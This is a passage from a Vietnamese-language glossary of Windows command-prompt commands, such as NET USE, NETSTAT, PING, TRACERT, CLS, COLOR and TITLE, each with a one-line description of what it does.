Wortstration và Server NET STOP Dừng hoạt động một dịch vụ NET TIME Đồng bộ hóa thời gian hệ thống của máy cục bộ với máy chủ thời gian NET USE Kết nối đến một tài nguyên chia sẽ trên mạng NET USER Thiết lập cho một tài khoản người dùng trên mạng. NET VIEW Hiển thị tài nguyên được chia sẽ trên mạng NETSTAT Hiển thị tình hình hoạt động của TCP/IP PATHPING Phân tích chi tiết đường truyền của gói dữ liệu trên mạng PING Kiểm tra kết nối với một máy trên mạng ROUTE Xác định đường đi của một gói dữ liệu trên mạng TRACERT Công cụ phân tích đường đi của một gói dữ liệu.

DOS PROMPTBao gồm những lệnh cho phép bạn thực hiện các thao tác để thay đổi giao diện cũng như các thiết lập đối với cửa sổ lệnh Dos

CLS Xóa màn hình cửa sổ lệnh CMD Khởi động một sự kiện mới của trình biên dịch Dos. COLOR Thiết lập màu nền, màu chữ của cửa sổ lệnh ECHO Hiển thị một dòng thông điệp trên cửa sổ lệnh EXIT Thoát khỏi một sự kiện của trình biên dịch lệnh MORE Tùy biến màn hình xuất dữ liệu trên cửa sổ lệnhz PATH Thiết lập đường dẫn định hướng cho các tập tin lệnh. PAUSE Tạm thời dừng thực hiện các lệnht trong tập tin lệnh

PROMPT Thay đổi các thuộc tính của cửa sổ lệnh REM Thêm dòng chú thích trong tập tin lệnh START Khởi động một cửa sổ mới để thực hiện 1 lệnh TITLE Thay đổi tiêu đề cửa sổ lệnh